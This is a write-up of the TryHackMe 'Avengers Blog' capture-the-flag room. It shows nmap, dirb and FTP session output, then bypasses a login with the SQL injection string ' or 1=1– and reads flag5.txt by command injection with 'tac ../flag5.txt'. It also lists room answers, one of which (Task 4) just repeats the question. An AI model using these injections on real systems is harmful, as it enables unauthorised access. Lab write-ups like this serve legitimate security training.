TryHackMe - Avengers Blog - Writeup

Avengers Blog

Learn to hack into Tony Stark’s machine! You will enumerate the machine, bypass a login portal via SQL injection and gain root access by command injection.

Nmap scan

root@ip-10-10-193-98:~# nmap -sCV -A 10.10.4.46 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-10 12:02 BST
Nmap scan report for ip-10-10-4-46.eu-west-1.compute.internal (10.10.4.46)
Host is up (0.00044s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a5:78:fc:a2:f9:6d:00:50:cf:92:7f:29:3f:9a:97:f0 (RSA)
|   256 21:a7:cc:07:08:53:5e:27:76:cb:33:9b:7b:3b:fb:5a (ECDSA)
|_  256 7d:02:3e:90:ca:dc:69:db:6a:54:0a:30:5b:dc:72:53 (EdDSA)
80/tcp open  http    Node.js Express framework
|_http-title: Avengers! Assemble!
MAC Address: 02:8C:13:DB:84:27 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=6/10%OT=21%CT=1%CU=42832%PV=Y%DS=1%DC=D%G=Y%M=028C13%T
OS:M=60C1F179%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10D%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=109%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=
OS:6903%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms ip-10-10-4-46.eu-west-1.compute.internal (10.10.4.46)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.51 seconds
root@ip-10-10-193-98:~#

Directory Fuzzing


root@ip-10-10-193-98:~# dirb http://10.10.4.46/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jun 10 12:10:23 2021
URL_BASE: http://10.10.4.46/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

                                                                              GENERATED WORDS: 4612

---- Scanning URL: http://10.10.4.46/ ----
                                                                              + http://10.10.4.46/assets (CODE:301|SIZE:179)                               
+ http://10.10.4.46/css (CODE:301|SIZE:173)                                  
+ http://10.10.4.46/home (CODE:302|SIZE:23)                                  
+ http://10.10.4.46/Home (CODE:302|SIZE:23)                                  
+ http://10.10.4.46/img (CODE:301|SIZE:173)                                  
+ http://10.10.4.46/js (CODE:301|SIZE:171)                                   
+ http://10.10.4.46/logout (CODE:302|SIZE:29)                                
+ http://10.10.4.46/portal (CODE:200|SIZE:1409)                              
                                                                               
-----------------
END_TIME: Thu Jun 10 12:13:47 2021
DOWNLOADED: 4612 - FOUND: 8
root@ip-10-10-193-98:~#

Target: http://10.10.4.46/portal

Task 2:

On the deployed Avengers machine you recently deployed, get the flag1 cookie value.

  • Answer: cookie_secrets

Task 3:

Look at the HTTP response headers and obtain flag 2.

Check the header of target URL http://10.10.4.46/

  • Answer: headers_are_important
root@ip-10-10-193-98:~# ftp 10.10.4.46
Connected to 10.10.4.46.
220 (vsFTPd 3.0.3)
Name (10.10.4.46:root): groot
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> help
Commands may be abbreviated.  Commands are:

!		dir		mdelete		qc		site
$		disconnect	mdir		sendport	size
account		exit		mget		put		status
append		form		mkdir		pwd		struct
ascii		get		mls		quit		system
bell		glob		mode		quote		sunique
binary		hash		modtime		recv		tenex
bye		help		mput		reget		tick
case		idle		newer		rstatus		trace
cd		image		nmap		rhelp		type
cdup		ipany		nlist		rename		user
chmod		ipv4		ntrans		reset		umask
close		ipv6		open		restart		verbose
cr		lcd		prompt		rmdir		?
delete		ls		passive		runique
debug		macdef		proxy		send
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Oct 04  2019 files
226 Directory send OK.
ftp> get files
local: files remote: files
200 PORT command successful. Consider using PASV.
550 Failed to open file.
ftp> cd files
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              33 Oct 04  2019 flag3.txt
226 Directory send OK.
ftp> get flag3.txt
local: flag3.txt remote: flag3.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag3.txt (33 bytes).
226 Transfer complete.
33 bytes received in 0.00 secs (15.6288 kB/s)
ftp> quit
221 Goodbye.
root@ip-10-10-193-98:~#

Task 4:

Look around the FTP share and read flag 3!

Answer: Look around the FTP share and read flag 3!

Task 5:

What is the directory that has an Avengers login?

Answer: /portal

Task 6:

Use ‘ or 1=1– in username and password

Log into the Avengers site. View the page source, how many lines of code are there?

Answer: 223

Task 7:

Read the contents of flag5.txt

use tac ../flag5.txt

Answer: d335e2d13f36558ba1e67969a1718af7

Thanks for reading

Room link: Avengers Blog

Written on June 10, 2021